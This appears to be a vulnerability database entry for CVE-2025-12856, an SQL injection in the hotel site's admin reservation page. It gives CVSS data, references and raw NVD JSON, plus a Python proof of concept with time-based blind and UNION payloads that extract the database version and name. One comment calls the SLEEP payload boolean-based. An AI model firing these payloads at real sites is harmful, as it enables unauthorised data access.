CVE-2025-12856

Description

A weakness has been identified in code-projects Responsive Hotel Site 1.0. Impacted is an unknown function of the file /admin/reservation.php. This manipulation of the argument email causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:responsive_hotel_site:1.0:*:*:*:*:*:*:* - VULNERABLE

Responsive Hotel Site 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-12856 PoC - SQL Injection in Responsive Hotel Site 1.0 # Target: /admin/reservation.php # Parameter: email import requests import sys target_url = "http://target-site.com/admin/reservation.php" # SQL Injection payload examples: # Boolean-based blind SQL injection payload_blind = "[email protected]' AND (SELECT 9427 FROM (SELECT(SLEEP(5)))fake)-- -" # Union-based SQL injection to extract database version payload_union = "[email protected]' UNION ALL SELECT NULL,NULL,NULL,NULL,version(),NULL,NULL,NULL-- -" # Extract current database name payload_dbname = "[email protected]' UNION ALL SELECT NULL,NULL,NULL,NULL,database(),NULL,NULL,NULL-- -" def exploit_sqli(url, payload): """Send SQL injection payload via email parameter""" headers = { 'User-Agent': 'Mozilla/5.0', 'Cookie': 'PHPSESSID=admin_session_id' # Requires admin authentication } data = { 'email': payload, 'submit': 'Book' # Adjust based on actual form field names } try: response = requests.post(url, data=data, headers=headers, timeout=30) return response.text except requests.exceptions.RequestException as e: return f"Error: {e}" if __name__ == "__main__": print("CVE-2025-12856 SQL Injection PoC") print(f"Target: {target_url}") print("\nTesting blind SQL injection...") result = exploit_sqli(target_url, payload_blind) print(f"Response length: {len(result)}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12856
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12856
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12856/
[4] VulDB https://vuldb.com/cve/CVE-2025-12856
[5] https://code-projects.org/
[6] https://github.com/AmengDream/CVE/blob/main/Responsive_Hotel_Site/reservation-sql-injection/report.md
[7] https://vuldb.com/?ctiid.331502
[8] https://vuldb.com/?id.331502
[9] https://vuldb.com/?submit.679744
[10] https://github.com/AmengDream/CVE/blob/main/Responsive_Hotel_Site/reservation-sql-injection/report.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12856", "sourceIdentifier": "[email protected]", "published": "2025-11-07T14:15:49.420", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in code-projects Responsive Hotel Site 1.0. Impacted is an unknown function of the file /admin/reservation.php. This manipulation of the argument email causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:responsive_hotel_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BEEBA52B-991B-4FF9-AE6A-14E21F1F7E50"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/AmengDream/CVE/blob/main/Responsive_Hotel_Site/reservation-sql-injection/report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.331502", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.331502", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.679744", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/AmengDream/CVE/blob/main/Responsive_Hotel_Site/reservation-sql-injection/report.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}